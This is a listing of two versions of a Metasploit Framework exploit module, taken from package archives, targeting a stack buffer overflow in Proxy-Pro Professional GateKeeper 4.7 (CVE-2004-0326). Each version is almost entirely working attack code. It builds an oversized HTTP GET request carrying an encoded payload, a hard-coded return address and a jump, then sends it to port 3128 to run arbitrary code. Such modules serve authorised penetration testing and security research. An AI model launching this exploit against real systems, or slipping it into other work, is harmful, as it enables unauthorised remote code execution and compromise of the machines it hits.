==> metasploit-3.3.3.tbz: share/metasploit/modules/exploits/windows/proxy/proxypro_http_get.rb <==
##
# $Id: proxypro_http_get.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
			'Description'    => %q{
		        This module exploits a stack overflow in Proxy-Pro Professional
		        GateKeeper 4.7. By sending a long HTTP GET to the default port
				of 3128, a remote attacker could overflow a buffer and execute
				arbitrary code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7724 $',
			'References'     => 
				[ 
					['CVE', '2004-0326'], 
					['OSVDB', '4027'],
					['BID', '9716'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00+&=%\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
				],

			'Privileged'     => true,

			'DisclosureDate' => 'Feb 23 2004',

			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(3128)
				], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET /" + rand_text_english(3603, payload_badchars)  
		sploit += payload.encoded + [target.ret].pack('V') + make_nops(10) 
		sploit += "\xe9" + [-497].pack('V') +  " HTTP/1.0" + "\r\n\r\n" 

		sock.put(sploit)
		sock.get_once(-1, 3)
		
		handler
		disconnect
	end

end

==> metasploit-4.5.0.tbz: share/metasploit/modules/exploits/windows/proxy/proxypro_http_get.rb <==
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Proxy-Pro Professional
				GateKeeper 4.7. By sending a long HTTP GET to the default port
				of 3128, a remote attacker could overflow a buffer and execute
				arbitrary code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2004-0326'],
					['OSVDB', '4027'],
					['BID', '9716'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00+&=%\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Feb 23 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(3128)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET /" + rand_text_english(3603, payload_badchars)
		sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
		sploit += "\xe9" + [-497].pack('V') +  " HTTP/1.0" + "\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
